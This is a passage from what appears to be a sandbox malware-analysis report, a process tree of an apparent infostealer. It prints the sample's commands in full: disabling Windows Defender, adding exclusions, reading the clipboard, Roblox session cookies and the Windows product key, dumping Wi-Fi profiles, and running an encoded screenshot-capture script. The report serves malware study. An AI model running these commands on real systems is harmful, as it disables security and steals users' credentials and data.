wrote to memory of 4100 808 Built.exe 101 PID 808 wrote to memory of 2232 808 Built.exe 102 PID 808 wrote to memory of 2232 808 Built.exe 102 PID 808 wrote to memory of 2848 808 Built.exe 103 PID 808 wrote to memory of 2848 808 Built.exe 103 PID 2232 wrote to memory of 1548 2232 cmd.exe 107 PID 2232 wrote to memory of 1548 2232 cmd.exe 107 PID 4100 wrote to memory of 1848 4100 cmd.exe 108 PID 4100 wrote to memory of 1848 4100 cmd.exe 108 PID 808 wrote to memory of 3252 808 Built.exe 109 PID 808 wrote to memory of 3252 808 Built.exe 109 PID 808 wrote to memory of 3160 808 Built.exe 110 PID 808 wrote to memory of 3160 808 Built.exe 110 PID 2848 wrote to memory of 4960 2848 cmd.exe 112 PID 2848 wrote to memory of 4960 2848 cmd.exe 112 PID 4672 wrote to memory of 1968 4672 Exodus.exe 114 PID 4672 wrote to memory of 1968 4672 Exodus.exe 114 PID 808 wrote to memory of 4856 808 Built.exe 115 PID 808 wrote to memory of 4856 808 Built.exe 115 PID 808 wrote to memory of 4700 808 Built.exe 117 PID 808 wrote to memory of 4700 808 Built.exe 117 PID 4672 wrote to memory of 2840 4672 Exodus.exe 116 PID 4672 wrote to memory of 2840 4672 Exodus.exe 116 PID 808 wrote to memory of 3732 808 Built.exe 119 PID 808 wrote to memory of 3732 808 Built.exe 119 PID 808 wrote to memory of 4492 808 Built.exe 121 PID 808 wrote to memory of 4492 808 Built.exe 121 PID 4768 wrote to memory of 1132 4768 Dll-protected.exe 123 PID 4768 wrote to memory of 1132 4768 Dll-protected.exe 123 PID 808 wrote to memory of 3172 808 Built.exe 124 PID 808 wrote to memory of 3172 808 Built.exe 124 PID 808 wrote to memory of 2168 808 Built.exe 126 PID 808 wrote to memory of 2168 808 Built.exe 126 PID 4768 wrote to memory of 924 4768 Dll-protected.exe 127 PID 4768 wrote to memory of 924 4768 Dll-protected.exe 127 PID 4768 wrote to memory of 924 4768 Dll-protected.exe 127 PID 3252 wrote to memory of 2184 3252 cmd.exe 128
Processes
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"5⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:3160
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:4856
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:4700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:3732
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4492
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3172 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:2168
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:1244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rll4i2ro\rll4i2ro.cmdline"7⤵PID:6100
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED6D.tmp" "c:\Users\Admin\AppData\Local\Temp\rll4i2ro\CSCBD6BCA8DACD3479FA5B84D70EA40C83D.TMP"8⤵PID:4468
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5160
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5824
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4160
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4292
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:872
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:1532
-
C:\Windows\system32\getmac.exegetmac6⤵PID:4280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:5124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:2416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵PID:812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43762\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\JBmy8.zip" *"5⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\_MEI43762\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI43762\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\JBmy8.zip" *6⤵PID:228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:216
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:2220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:5580
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:4292
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:5640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
PID:1592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:2088
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:5564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:3192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵PID:4360
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5576 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:3244
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5556
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
- System Location Discovery: System Language Discovery
PID:5488
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- System Location Discovery: System Language Discovery
PID:4496 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:5484
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4160
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"4⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5716 -
C:\Windows\SysWOW64\chcp.comchcp 650016⤵PID:5332
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2536
-
-
C:\Windows\SysWOW64\findstr.exefindstr All6⤵PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid5⤵PID:5800
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵PID:5712
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid6⤵PID:2692
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"5⤵
- Executes dropped EXE
PID:1132 -
